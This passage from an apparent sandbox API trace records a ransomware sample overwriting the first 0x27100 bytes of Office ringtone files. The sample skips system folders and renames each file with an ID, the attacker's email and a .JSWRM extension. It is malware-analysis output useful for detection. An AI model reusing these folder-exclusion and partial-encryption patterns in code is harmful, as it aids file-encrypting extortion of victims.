cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0135.620] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone3.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone3.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.621] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=676096) returned 1 [0135.621] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.621] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.635] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.635] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.636] CloseHandle (hObject=0x238) returned 1 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0135.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0135.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0135.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0135.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0135.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone3.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone3.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone3.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone3.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0135.638] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b16c081, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b16c081, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b192318, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a400, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone4.wav", cAlternateFileName="LY7D9C~1.WAV")) returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2=".") returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="..") returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="...") returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="windows") returned -1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="recovery") returned -1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="perflogs") returned -1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="documents and settings") returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="system volume information") returned -1 [0135.638] lstrcmpiW (lpString1="LYNC_ringtone4.wav", lpString2="msocache") returned -1 [0135.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone4.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone4.wav", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone4.wav", lpUsedDefaultChar=0x0) returned 18 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone4.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone4.wav", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone4.wav", lpUsedDefaultChar=0x0) returned 18 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0135.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0135.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone4.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.639] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1156096) returned 1 [0135.639] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.639] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.653] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.653] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.653] CloseHandle (hObject=0x238) returned 1 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0135.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0135.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0135.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0135.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0135.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0135.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0135.654] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone4.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone4.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone4.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone4.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0135.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0135.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0135.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0135.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0135.655] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b16c081, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b16c081, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1b855a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5e02c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone5.wav", cAlternateFileName="LY4D2F~1.WAV")) returned 1 [0135.655] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2=".") returned 1 [0135.655] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="..") returned 1 [0135.655] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="...") returned 1 [0135.655] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="windows") returned -1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="recovery") returned -1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="perflogs") returned -1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="documents and settings") returned 1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="system volume information") returned -1 [0135.656] lstrcmpiW (lpString1="LYNC_ringtone5.wav", lpString2="msocache") returned -1 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone5.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone5.wav", cchWideChar=18, lpMultiByteStr=0x240f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone5.wav", lpUsedDefaultChar=0x0) returned 18 [0135.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone5.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone5.wav", cchWideChar=18, lpMultiByteStr=0x240f20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone5.wav", lpUsedDefaultChar=0x0) returned 18 [0135.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0135.656] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.656] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.656] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0135.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone5.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone5.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0135.657] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=385068) returned 1 [0135.657] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.657] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0135.657] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0135.670] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.670] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0135.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0135.671] CloseHandle (hObject=0x238) returned 1 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0135.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0135.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0135.671] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0135.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0135.671] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0135.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0135.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0135.671] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone5.wav" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone5.wav"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone5.wav.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\media\\lync_ringtone5.wav.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0135.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0135.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0135.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0135.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0135.672] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0135.672] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b1b855a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b1b855a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b1b855a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x57220, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="LYNC_ringtone6.wav", cAlternateFileName="LY1805~1.WAV")) returned 1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2=".") returned 1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="..") returned 1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="...") returned 1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="windows") returned -1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="recovery") returned -1 [0135.672] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="perflogs") returned -1 [0135.673] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="documents and settings") returned 1 [0135.673] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="$RECYCLE.BIN") returned 1 [0135.673] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="system volume information") returned -1 [0135.673] lstrcmpiW (lpString1="LYNC_ringtone6.wav", lpString2="msocache") returned -1 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone6.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone6.wav", cchWideChar=18, lpMultiByteStr=0x241060, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone6.wav", lpUsedDefaultChar=0x0) returned 18 [0135.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone6.wav", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LYNC_ringtone6.wav", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LYNC_ringtone6.wav", lpUsedDefaultChar=0x0) returned 18 [0135.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0135.673] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0135.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0135.673] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0135.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Media\\LYNC_ringtone6.wav" (normalized: "c:\\program files\\microsoft 